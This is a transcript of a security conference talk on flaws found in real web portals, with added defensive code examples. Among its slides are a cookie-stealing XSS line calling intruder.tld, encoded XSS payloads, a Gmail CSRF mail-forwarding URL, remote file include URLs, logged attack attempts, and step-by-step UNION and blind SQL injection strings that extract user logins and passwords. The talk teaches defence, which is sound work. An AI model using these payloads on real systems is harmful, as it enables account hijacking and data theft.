Minor Mistakes In Web Portals

Michal Sobiegraj and Borys Lacki

Slide transcript:
Slide 1. Minor Mistakes in Web Portals. A Real Case Study ;-)
  Borys Łącki
  Michał Sobiegraj, CISSP

Slide 2. Why is Web important?

Slide 3. Web is everywhere

Slide 4.
  - We spend money
  - We manage our finances
  - We earn money
  - We waste our time

Slide 5. Internet traffic
  Source: http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf

Slide 6. 2007: Web traffic has finally overtaken P2P

Slide 7. Web has beaten pr0n! YAY!*
  * not supported by any research

Slide 8. HTTP traffic breakdown
  Source: http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf

Slide 9. Number of Internet hosts increases
  Over 60 mln active hosts (Netcraft)

Slide 10. Web security in a nutshell

Slide 11. Web vulnerabilities make up nearly half of all discovered vulnerabilities in 2007 (SANS)

Slide 12. Why?
  - A really popular medium ($)
  - Immature technology
  - Logical errors
  - Home-made solutions

Slide 13. Phishing victims in the US
  3.6 million people lost $3.2 billion total
  (Gartner, http://www.heise-online.pl/news/item/2356/)

Slide 14. Standard Web application architecture (diagram)
  Internet -> WWW layer (I/O filters) -> Application layer (business logic) -> Database server

Slide 15. Wrong! (diagram)
  Internet -> WWW layer (I/O filters) -> New functionality -> Application layer (business logic) -> Database server

Slide 16. Application Firewall vs. Proper architecture, coding and SDLC (diagram)
  Internet -> Web Application Firewall -> WWW layer (I/O filters) -> New functionality -> Application layer (business logic) -> Database server

Slide 17. The right approach (diagram)
  Internet -> Web Application Firewall -> WWW layer (I/O filters) -> Application layer / New functionality (business logic) -> Database server

Slide 18. Most popular attacks
  - PHP Remote File Include
  - SQL Injection
  - Cross-Site Scripting
  - Cross-site Request Forgery
  (SANS Top-20 2007 Security Risks, 2007 Annual Update)

Slide 19. Information disclosure

Slide 20. A funny story ;-)

Slide 21. More pics hmm…

Slide 22. (picture only)

Slide 23. :-D

Slide 24. Downloaded…

Slide 25. Connecting…

Slide 26. PWND ;-)

Slide 27. Conclusion? Staying secure requires a specific mindset (Paranoia? ;-)

Slide 28. Client side access control
  - It's possible to bypass the interface
  - Unlike in ATMs
  Does not work!

Slide 29. Client side access control
  - RSS feed name based on user ID
      server.tld/rss/100_rss.xml
      server.tld/rss/101_rss.xml
      server.tld/rss/102_rss.xml
  - Reading other users' messages
      server.tld/index.php?p=ok&action=msgs2&msgs_id=80
      server.tld/index.php?p=ok&action=msgs2&msgs_id=81
      server.tld/index.php?p=ok&action=msgs2&msgs_id=82

Slide 30. Solution: Server side access control

Slide 31. Cross-Site Scripting (XSS)

Slide 32. Reflective XSS (diagram)
  Intruder -> User: http://server/index.php?id=<script>…</script>
  User -> Web Application (Server): GET /index.php?id=<script>…</script> HTTP/1.1
  Server -> User: …<script>…</script>…
  User's browser: exec(…)
  Data available in the context of the User

Slide 33. Example XSS code
    document.write('<img src="http://intruder.tld/cookiemonster.gif?' + escape(document.cookie) + '">');

Slide 34. Content alteration through an XSS attack

Slide 35. Rebranding through XSS
  http://server.tld/topics/%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,101,122,111,116,101,114,105,107,97,46,112,108,47,105,109,97,103,101,115,47,115,109,105,108,101,121,46,103,105,102,39,62,34));%3C%252fscript%3E
  The encoded payload evaluates to:
    document.getElementById("logo").innerHTML = "<img src='http://www.srv.tld/images/smiley.gif'>"

Slide 36. This is how it looks in the webpage code
    ...
    <div id="maincontent">
      <h2>Results for: <span style="color: #f00;"><script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,101,122,111,116,101,114,105,107,97,46,112,108,47,105,109,97,103,101,115,47,115,109,105,108,101,121,46,103,105,102,39,62,34));</script></span></h2>
    </div>
    ...

Slide 37. The code that is to be changed
    <div id="logo">
      <div class="logolink">
        <a href="http://server.tld/">server.tld</a>
      </div>
      ...
    </div>

Slide 38. The code in a Web browser

Slide 39. Final outcome

Slide 40. Rendered in a browser

Slide 41. Content change using XSS
  - Is not permanent
  - Better code -> easier (sic!)
  An idea: a form that looks just like a legitimate one, but sends input data elsewhere -> phishing

Slide 42. Authentication using cookies
  User -> Server:
    POST /login.php HTTP/1.1
    login=user&password=asd12ed]r3
  Server -> User:
    HTTP/1.1 200 OK
    Set-Cookie: user_id=734223s8uod42
    Welcome user
  User -> Server:
    GET /index.php HTTP/1.1
    Cookie: user_id=734223s8uod42
  Server -> User:
    Welcome user

Slide 43. Impersonating a legitimate user
  The same exchange as on slide 42, followed by:
  Intruder -> Server:
    GET /index.php HTTP/1.1
    Cookie: user_id=734223s8uod42
  Server -> Intruder:
    Welcome user

Slide 44. Session cookie hijacking
  http://www.server.tld/index.php?p=comments&comments_login=smietanka%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
  What the page then displays:
    PHPSESSID=gji9h519llgbgbnaqg7si0q1l0; __utma=258102041.949163972.1198624259.1198624259.1198624259.1; __utmb=258102041; __utmc=258102041; __utmz=258102041.1198624259.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Slides 45-47. (screenshots only)

Slide 48. How to send yourself a cookie?
  - XMLHttpRequest: troublesome across domains
  - Link: img, iframe, location.href, etc.
  Example:
    <img src="http://server.tld/cookiemonster.gif?PHPSESSID%3Dgji9h519llgbgbnaqg7si0q1l0%3B%20__utma%3D258102041.949163972.1198624259.1198624259.1198624259.1%3B%20__utmb%3D258102041%3B%20__utmc%3D258102041%3B%20__utmz%3D258102041.1198624259.1.1.utmccn%3D%28direct%29%7Cutmcsr%3D%28direct%29%7Cutmcmd%3D%28none%29">

Slide 49. What can we do?
  - Tie a session ID to an IP address
  - Require re-authentication
  - Filter or sanitise input data !!!
    - White-listing (ScRipT)
    - Consistency (IDS, Firewall, App)
    - In-depth (....// -> ../), UTF-7
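The defensive counterpart of slides 44 and 49, as an added example that is not part of the original deck: the comments_login value is reflected into an HTML text context only after output encoding, and the session cookie is issued with HttpOnly so that document.cookie cannot read it (a control the slides do not list; Secure and SameSite are further assumptions of this example). The function names, the URL-decoded sample value and the cookie attributes are this example's own.

```python
import html
import urllib.parse

# Constructed sample: the comments_login parameter from the session-hijacking
# slide, URL-decoded the way the server sees it after request parsing.
RAW_COMMENTS_LOGIN = urllib.parse.unquote(
    "smietanka%3Cscript%3Edocument.write(document.cookie)%3C/script%3E"
)


def render_vulnerable(login: str) -> str:
    """Reflects the parameter straight into the page: the mistake from the slide."""
    return f"<h2>Results for: <span>{login}</span></h2>"


def render_escaped(login: str) -> str:
    """Encodes the value for an HTML text context before reflecting it.

    html.escape turns < > & " ' into entities, so whatever the parameter
    contains is rendered as text instead of being parsed as markup.
    """
    return f"<h2>Results for: <span>{html.escape(login, quote=True)}</span></h2>"


def contains_active_script(markup: str) -> bool:
    """Crude marker check, used here only to show the tag is inert after escaping."""
    return "<script" in markup.lower()


def session_cookie_header(name: str, value: str, secure: bool = True) -> str:
    """Builds a Set-Cookie header for the session ID.

    HttpOnly keeps the cookie out of document.cookie, so the cookiemonster.gif
    trick from the slides cannot read it even while an XSS bug remains. Secure
    and SameSite=Lax are hardening choices assumed by this example.
    """
    attrs = [f"{name}={value}", "Path=/", "HttpOnly", "SameSite=Lax"]
    if secure:
        attrs.append("Secure")
    return "Set-Cookie: " + "; ".join(attrs)


if __name__ == "__main__":
    print(render_vulnerable(RAW_COMMENTS_LOGIN))
    print(render_escaped(RAW_COMMENTS_LOGIN))
    print(session_cookie_header("PHPSESSID", "gji9h519llgbgbnaqg7si0q1l0"))
```

Encoding is context specific: html.escape is right for element text and quoted attributes, but a value placed inside a JavaScript block or a URL needs that context's encoder instead. HttpOnly only hides the cookie from script; an injected script can still issue requests with it (the CSRF-through-XSS point on slide 55), so the cookie flag complements output encoding rather than replacing it.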
Slide 50. http://server.tld/topics/<img src=http://www.serv.tld/images/smiley.gif>
  /

Slide 51. http://server.tld/topics/<img src=http:%2f%2fwww.serv.tld%2fimages%2fsmiley.gif>
  %2f -> /

Slide 52. http://server.tld/topics/<img src=http:%252f%252fwww.serv.tld%252fimages%252fsmiley.gif>
  %252f -> %2f -> /
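Slides 49 to 52 make two points about filters: a single-pass removal of "../" turns "....//" into "../", and a filter that looks at "%2f" is walked past by "%252f" because the value is decoded again later. The following added example (not part of the original deck) canonicalises a parameter to a fixpoint before validating it against an allow-list, and contrasts the single-pass traversal filter with a repeated one. The allow-list pattern, the function names and the sample values are assumptions of this example.

```python
import re
import urllib.parse

# Constructed allow-list for the topic parameter: letters, digits, space,
# underscore and hyphen. The real portal's rules are not on the slides.
ALLOWED_TOPIC = re.compile(r"[A-Za-z0-9 _\-]+")


def decode_to_fixpoint(value: str, max_rounds: int = 5):
    """Percent-decode until the string stops changing.

    Returns (fully decoded value, number of rounds that changed something), so
    '%252f' comes back as ('/', 2): two layers of encoding were peeled off.
    """
    rounds = 0
    current = value
    while rounds < max_rounds:
        decoded = urllib.parse.unquote(current)
        if decoded == current:
            break
        current = decoded
        rounds += 1
    return current, rounds


def validate_topic(raw: str) -> str:
    """Canonicalise first, then validate; never the other way round."""
    decoded, rounds = decode_to_fixpoint(raw)
    if rounds > 1:
        # A browser encodes once; a second layer only exists to dodge a filter.
        return "reject: multiply-encoded"
    if not ALLOWED_TOPIC.fullmatch(decoded):
        return "reject: disallowed characters"
    return "ok"


def naive_strip_traversal(path: str) -> str:
    """Single-pass removal of '../': the filter that turns '....//' into '../'."""
    return path.replace("../", "")


def collapse_traversal(path: str) -> str:
    """Repeats the removal until nothing changes, so nested sequences cannot survive."""
    previous = None
    while previous != path:
        previous = path
        path = path.replace("../", "").replace("..\\", "")
    return path


if __name__ == "__main__":
    for sample in (
        "security",
        "<img src=http://www.serv.tld/images/smiley.gif>",
        "<img src=http:%2f%2fwww.serv.tld%2fimages%2fsmiley.gif>",
        "<img src=http:%252f%252fwww.serv.tld%252fimages%252fsmiley.gif>",
    ):
        print(sample, "->", validate_topic(sample))
    print(naive_strip_traversal("....//etc/passwd"), "|", collapse_traversal("....//etc/passwd"))
```

Rejecting the request is preferable to stripping: collapse_traversal is shown to make the "....//" point concrete, but a value that needed stripping at all is evidence of tampering, and a positive allow-list applied to the canonical form makes the question moot.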
Slide 53. (picture only)

Slide 54. Stored XSS (diagram)
  Intruder -> Web Application: POST /register.php HTTP/1.1, login=<script>…</script>&password=asd (stored in the Database)
  User -> Web Application: GET /index.php HTTP/1.1
  Web Application -> User: …<script>…</script>…
  User's browser: exec(…)
  Data available in the context of the User

Slide 55. Stored XSS Exploitation?
  - Permanent content alteration
  - Easy session ID hijack
  - CSRF
  - XSS Proxy
  - Automated worms: mySpace, Orkut, Nduja, Borys
  Easy ;] in web portals that allow users to publish their own content: bidding portals, blogs, web fora, etc.

Slide 56. Session ID hijack

Slides 57-59. XSS Worm (diagrams)
  - Intruder stores the XSS-worm code in their profile on the Web Server
  - User_1: GET /intruder/ HTTP/1.1 -> …<script>…</script>… -> exec(…) -> stores the XSS-worm code in User_1's profile
  - User_2: GET /user1/ HTTP/1.1 -> …<script>…</script>… -> exec(…) -> stores the XSS-worm code in User_2's profile

Slide 60. Nduja – A Cross Domain/Webmail XSS Worm (diagram)
  Intruder -> E-mail -> WebMail Web Server, repeated across Libero.it, Tiscali.it, Lycos.it and Excite.com

Slide 61. What can we do?
  - Tie a session ID to an IP address
  - Require re-authentication
  - Filter or sanitise input data !!!
    - White-listing (ScRipT)
    - Consistency (IDS, Firewall, App)
    - In-depth (....// -> ../), UTF-7
  - Filter or sanitise data stored in and read from a database

Slide 62. Cross-Site Request Forgery (CSRF)

Slide 63. CSRF (diagram)
  Intruder -> User: http://server.tld/delete.php?id=34
  User -> Web Application: GET /delete.php?id=34 HTTP/1.1, Cookie: user_id=734223s8uod42
  Web Application: … id = 34; delete(id); … -> Item deleted!

Slide 64. Useful in getting to know your users a wee bit better…
    <img src="http://nasza-klasa.pl/invite/1?i=1">
  (/var/log/apache/fbi_cia_what-not_access.log)

Slide 65. Gmail message interception (CSRF)
  http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/wt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter
  Everyone (well almost) has a Gmail account! (Domain hijack: www.davidairey.co.uk)

Slide 66. What can we do?
  - POST instead of GET: not very bullet-proof (iframe, javascript)
  - Referrer: not very bullet-proof either (proxy, browsers, header alteration)
  - Additional temporary ID
    - User ID tied to a long unpredictable key
    - ID-key association held on the server side
  - Re-authentication before sensitive operations
  - Vulnerability-free code!!!
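The "additional temporary ID" recipe from slide 66, worked through for the delete.php case of slide 63, as an added example that is not part of the original deck: a long unpredictable key is issued per session, the session-to-key association lives on the server, and the handler refuses anything that is not a POST carrying the matching key. The class and function names, the request dictionary shape and the session identifiers are this example's own.

```python
import hmac
import secrets
from typing import Dict, Optional, Tuple


class CsrfTokenStore:
    """Server-side association between a session and its anti-CSRF key.

    The in-memory dict stands in for a real session backend; the point is that
    the key never has to be guessable from anything a cross-site page can see.
    """

    def __init__(self) -> None:
        self._tokens: Dict[str, str] = {}

    def issue(self, session_id: str) -> str:
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._tokens[session_id] = token
        return token

    def verify(self, session_id: str, presented: Optional[str]) -> bool:
        expected = self._tokens.get(session_id)
        if expected is None or presented is None:
            return False
        # Constant-time comparison so response timing does not leak the key.
        return hmac.compare_digest(expected, presented)


def handle_delete(store: CsrfTokenStore, request: dict) -> Tuple[int, str]:
    """Hypothetical delete.php handler.

    `request` is a constructed dict with 'method', 'session' (the value of the
    session cookie the browser attached) and 'form' (the submitted fields).
    """
    if request["method"] != "POST":
        # POST-only is not bullet-proof on its own (slide 66), but it removes
        # the bare <img src="...delete.php?id=34"> vector from slide 63.
        return 405, "method not allowed"
    form = request.get("form", {})
    if not store.verify(request["session"], form.get("csrf_token")):
        # A cross-site form (iframe, JavaScript submit) rides on the victim's
        # cookie but cannot read the victim's key, so it stops here.
        return 403, "missing or invalid CSRF token"
    return 200, f"Item {form['id']} deleted!"


if __name__ == "__main__":
    store = CsrfTokenStore()
    token = store.issue("sess-user")
    print(handle_delete(store, {"method": "GET", "session": "sess-user", "form": {"id": "34"}}))
    print(handle_delete(store, {"method": "POST", "session": "sess-user", "form": {"id": "34"}}))
    print(handle_delete(store, {"method": "POST", "session": "sess-user",
                                "form": {"id": "34", "csrf_token": token}}))
```

The key must be bound to the session, not merely valid somewhere: the last test below presents a key issued to a different session and is refused, which is what "ID-key association held on the server side" buys over a check that any known token exists.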
Slide 67. PHP File Include

Slide 68. Local file include
  - Local file snoop (configs)
  - Arbitrary code execution (if file upload to the server is permitted)
  - Access to source code
    <?php
    if (file_exists("includes/$page.inc")) {
        include "includes/$page.inc";
    } else {
        echo "In construction!<BR>";
    }
  http://XXXXX.art.pl/p.php?page=../../../../../../../../../home/user1/public_html/.htpasswd%00

Slide 69. Remote file include (Arbitrary code execution)
    <?php
    include($mosConfig_absolute_path."/administrator/components/com_hashcash/config.hashcash.php");
    require_once($mosConfig_absolute_path.'/components/com_hashcash/CryptoStrategy.php');
  http://server.tld/components/com_hashcash/server.php?mosConfig_absolute_path=http://evil.tld/evil.txt?
  Attempts seen in a real access_log:
    access_log:62.48.xxx.xx - - [06/Jan/2008:07:11:06 +0100] "GET //install/index.php?G_PATH=http://www.js2023.pl//modules/PNphpBB2/images/.bash/pr.txt? HTTP/1.1" 404 1021 "-" "libwww-perl/5.803"
    access_log:168.212.xxx.xxx - - [06/Jan/2008:22:57:53 +0100] "GET /files/strawberry/plugins/wacko/highlight/html.php?text=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 1021 "-" "libwww-perl/5.76"

Slide 70. What can we do?
  - Harden the application server (e.g. in php.ini):
      allow_url_fopen = Off
      allow_url_include = Off
      register_globals = Off
      safe_mode = On
      safe_mode_gid = Off
      display_errors = Off
      log_errors = On
      error_log = /var/log/httpd/php_error.log
      disable_functions = system, shell_exec, exec, passthru
  - Watch out for some special characters (null byte, etc.)
  - Filter and sanitise (../, UTF, etc.)
  - WAFs: mod_security, Suhosin PHP
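The application-level fix for the include on slide 68, beside the php.ini hardening on slide 70, as an added example that is not part of the original deck (Python rather than PHP so it can be run here; the resolution logic is the same). It shows why the vulnerable join escapes the includes directory for the .htpasswd traversal, then resolves the page parameter through an allow-list, a null-byte check and a canonical-path containment test. The allow-list contents, the base directory and the function names are assumptions of this example.

```python
import os

# Constructed allow-list of the page names the application actually ships.
ALLOWED_PAGES = {"home", "news", "contact"}


def resolve_page_unsafe(base: str, page: str) -> str:
    """Path the vulnerable snippet would include: base/includes/<page>.inc, untouched."""
    return os.path.join(base, "includes", page + ".inc")


def escapes_include_dir(base: str, page: str) -> bool:
    """True when the normalised path leaves the includes directory (the traversal case)."""
    include_dir = os.path.normpath(os.path.join(base, "includes"))
    target = os.path.normpath(resolve_page_unsafe(base, page))
    return os.path.commonpath([include_dir, target]) != include_dir


def resolve_page_safe(base: str, page: str) -> str:
    """Allow-list first, then a canonical-path containment check as a second layer."""
    if "\x00" in page:
        # In older PHP a null byte ended the string at the C level, dropping the
        # '.inc' suffix (slide 68's %00). A legitimate page name never has one.
        raise ValueError("null byte")
    if page not in ALLOWED_PAGES:
        raise ValueError("page not in allow-list")
    include_dir = os.path.realpath(os.path.join(base, "includes"))
    candidate = os.path.realpath(os.path.join(include_dir, page + ".inc"))
    if os.path.commonpath([include_dir, candidate]) != include_dir:
        raise ValueError("escapes include dir")
    return candidate


def classify(page: str, base: str = "/var/www") -> str:
    """Returns 'ok' or the reason the page parameter was refused."""
    try:
        resolve_page_safe(base, page)
        return "ok"
    except ValueError as exc:
        return str(exc)


if __name__ == "__main__":
    traversal = "../../../../../../../../../home/user1/public_html/.htpasswd"
    print(escapes_include_dir("/var/www", traversal))   # True
    print(classify("home"), "|", classify(traversal), "|", classify(traversal + "\x00"))
```

The allow-list alone already refuses every value on the slides; the realpath containment check is kept as defence in depth for the day someone relaxes the list to accept arbitrary names, and it is the check that still holds when a symlink inside includes/ points elsewhere.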
Slide 71. SQL Injection

Slide 72. SQL Injection (diagram)
  Intruder -> Web Application: GET /login.php HTTP/1.1, login=admin&password=1' or 1='1
  Query sent to the Database: select * from users where login='admin' and pass='1' or 1='1'
  Web Application -> Intruder: Welcome admin!
  Application code:
    $dane = db_exec("select * from users where login='$login' and pass='$pass'");
    if ($dane.count) {
        print("Welcome $login");
        …
    } else {
        print("Bye");
        exit(0);
    }
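The login on slide 72 rebuilt against an in-memory SQLite table, as an added example that is not part of the original deck: the string-built query beside the parameterised one the slides' "What can we do?" lists do not mention. SQLite compares the integer 1 and the text '1' as unequal, so the payload used here is the quoted variant 1' or '1'='1 rather than the slide's MySQL form 1' or 1='1; the effect on the WHERE clause is the same. The table contents, the function names and the payload are this example's own.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the portal's users table with one constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (login text, pass text)")
    conn.execute("insert into users values ('admin', 'correct-horse-constructed')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, login: str, password: str) -> str:
    """String-built query, as in the slide's db_exec(...) snippet."""
    query = f"select * from users where login='{login}' and pass='{password}'"
    rows = conn.execute(query).fetchall()
    return f"Welcome {login}" if rows else "Bye"


def login_safe(conn: sqlite3.Connection, login: str, password: str) -> str:
    """Parameterised query.

    The driver sends the values separately from the SQL text, so quotes in
    the password are data and never become syntax.
    """
    rows = conn.execute(
        "select * from users where login=? and pass=?", (login, password)
    ).fetchall()
    return f"Welcome {login}" if rows else "Bye"


if __name__ == "__main__":
    db = make_db()
    # AND binds tighter than OR, so the injected clause makes the WHERE true for every row.
    payload = "1' or '1'='1"
    print(login_vulnerable(db, "admin", payload))  # Welcome admin
    print(login_safe(db, "admin", payload))        # Bye
```

Parameterisation fixes the syntax problem, not the design one: the table here still stores the password in clear so the example stays short, which is a separate mistake a real users table must not repeat.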
Slide 73.
  POST http://www.server.tld/index.php?p=priv HTTP/1.1
  priv_search=2e332424&cat='"1&w_city="'asd&submit=Szukaj

Slide 74.
  priv_search=&cat=1&w_city=Ca%B3a+Polska' and 1=1#&submit=Szukaj

Slide 75.
  priv_search=&cat=1&w_city=Ca%B3a+Polska' and 1=0#&submit=Szukaj

Slide 76.
  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select @@version#&submit=Szukaj
  Error returned: The used SELECT statements have a different number of columns

Slide 77.
  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version#&submit=Szukaj

Slide 78.
  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16,17,18#&submit=Szukaj

Slide 79.
  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,TABLE_SCHEMA,5,6,7,8,9,10,TABLE_NAME,12,COLUMN_NAME,14,15,16,17,18 from information_schema.columns where TABLE_SCHEMA != 'mysql' and TABLE_SCHEMA != 'information_schema'#&submit=Szukaj

Slide 80.
  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,login,5,6,7,8,9,10,pass,12,sex,14,15,16,17,18 from users#&submit=Szukaj

Slide 81. Some S E C R E T S slip out ;-)
  14831 users already registered (yeah, right ;-)

Slide 82. Another discovery: there are 1836 bots :-)

Slide 83. Blind SQL Injection
  Registration form: '

Slide 84. Blind SQL Injection (experimenting)
  - 1' and 1='0 -> OK
  - 1' or 1='1 -> "This email is already registered. You need to pick another one"
  - 1' union all SELECT IF( user() like '%sig%', BENCHMARK(3000000,MD5( 'x' )),NULL)# -> delay -> user() == sig@...
  - 1' union all SELECT IF( user() like '%asd%', BENCHMARK(3000000,MD5( 'x' )),NULL)# -> no delay

Slide 85. Products 1-8 of 8

Slide 86. Product database for selected category is empty

Slide 87. Blind SQL Injection
  - /zgoda.php?id=155765%20AND%20(select%20ascii(substring((select%20login%20from%20admini%20limit%201,1),1,1)))%3D97
  - id=155765 AND (select ascii(substring((select login from admini limit LINIA,1), MIEJSCE, 1))) = ZNAK_ASCII
    (the Polish placeholders: LINIA = row, MIEJSCE = character position, ZNAK_ASCII = ASCII code of the guessed character)

Slide 88. Results of a successful blind SQL Injection attack
  - Delay
  - Different content
  - Error message

Slide 89. What can we do?
  - Filter and sanitise input data
    - Characters white-listing
    - Consistency (IDS, Firewall, Application, Database)
  - Do not trust user-side filters (selection lists, JavaScript, etc.)
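Slide 89's "consistency" point includes the IDS, and slide 69 shows what file-include attempts look like in an Apache access_log. The following added example (not part of the original deck) runs a small classifier over constructed log lines in that format: it decodes each query parameter twice (the %252f lesson of slide 52), then tags remote-URL values, traversal and null bytes, the injection and blind-probe patterns from slides 72 to 87, and script in a reflected parameter as on slide 44. The log lines, hosts, timestamps and regular expressions are this example's own; the request shapes follow the deck.

```python
import re
import urllib.parse

# Constructed access_log lines in the Apache combined format used on slide 69.
# Addresses, paths and times are made up; the request shapes follow the deck.
LOG_LINES = [
    '10.0.0.1 - - [06/Jan/2008:07:11:06 +0100] "GET /p.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.2 - - [06/Jan/2008:07:12:00 +0100] "GET //install/index.php?G_PATH=http://evil.tld/shell.txt? HTTP/1.1" 404 1021 "-" "libwww-perl/5.803"',
    '10.0.0.3 - - [06/Jan/2008:07:13:00 +0100] "GET /p.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '10.0.0.4 - - [06/Jan/2008:07:14:00 +0100] "GET /zgoda.php?id=155765%20AND%20(select%20ascii(substring((select%20login%20from%20admini%20limit%201,1),1,1)))%3D97 HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [06/Jan/2008:07:15:00 +0100] "GET /index.php?p=comments&comments_login=smietanka%3Cscript%3Edocument.write(document.cookie)%3C/script%3E HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
SQLI_RE = re.compile(
    r"union\s+all\s+select|benchmark\s*\(|ascii\s*\(\s*substring|'\s*(?:or|and)\s+", re.I
)
XSS_RE = re.compile(r"<script|document\.cookie", re.I)
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.I)


def query_values(target: str) -> list:
    """Decoded parameter values; decoding twice also exposes %25-encoded layers."""
    query = target.partition("?")[2]
    values = []
    for pair in query.split("&"):
        if pair:
            raw = pair.partition("=")[2]
            values.append(urllib.parse.unquote(urllib.parse.unquote(raw)))
    return values


def classify_line(line: str):
    """Returns (ip, set of tags), or None when the line is not in the expected format."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    tags = set()
    for value in query_values(m["target"]):
        if REMOTE_URL_RE.match(value):
            tags.add("rfi")          # slide 69: remote file include attempts
        if "../" in value or "\x00" in value:
            tags.add("lfi")          # slide 68: traversal or null byte
        if SQLI_RE.search(value):
            tags.add("sqli")         # slides 72-87: injection and blind probes
        if XSS_RE.search(value):
            tags.add("xss")          # slide 44: script in a reflected parameter
    if m["ua"].startswith("libwww-perl"):
        tags.add("scanner-ua")       # the user agent on both real log lines of slide 69
    return m["ip"], tags


def scan(lines):
    """Runs the classifier over a log and keeps only the lines that parsed."""
    return [result for result in map(classify_line, lines) if result is not None]


if __name__ == "__main__":
    for ip, tags in scan(LOG_LINES):
        print(ip, sorted(tags) or "-")
```

Signatures like these catch the scanners that leave 404s behind, which is useful for the "consistency" view across firewall, application and database, but they are a detection aid only: a case change, a comment or an encoding the decoder does not peel off slips past them, which is exactly why the slides put white-listing at the application ahead of pattern filters.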
Slide 90. Conclusion

Slide 91. Web application security is bad
  Vulnerability-causing mistakes are everywhere*
  * well, almost everywhere ;-)

Slide 92. What to do?
  Be sure to properly sanitise data coming from and being sent to the user
  - Web Application Firewall (WAF)
  - IDS
  White-listing!

Slide 93. Be aware of potential threats
  - Listen and ask
  - Use professional assistance
  - Perform a cost-benefit analysis
  Every piece of feedback is worth listening to

Slide 94. Use proven solutions
  - Traditional coding errors got answered by managed code, automatic typing, GC, etc.
  - Web frameworks help maintain code quality in Web Applications
    - Assure code quality to some degree
    - We are not 100% safe
      - Frameworks are not mature enough
      - Not everyone knows how to use them properly
      - Sometimes expanded in a dumb way
      - Wide exploitation due to mass usage

Slide 95. Hardening
  Proper configuration is a key! One application server configuration directive may prevent a vulnerability from being exploited.
  PHP: http://www.sans.org/top20/#s1

Slide 96. Think! No technical control will protect you from logical errors

Slide 97. Questions?
  michal@sobiegraj.com
  b.lacki@logicaltrust.net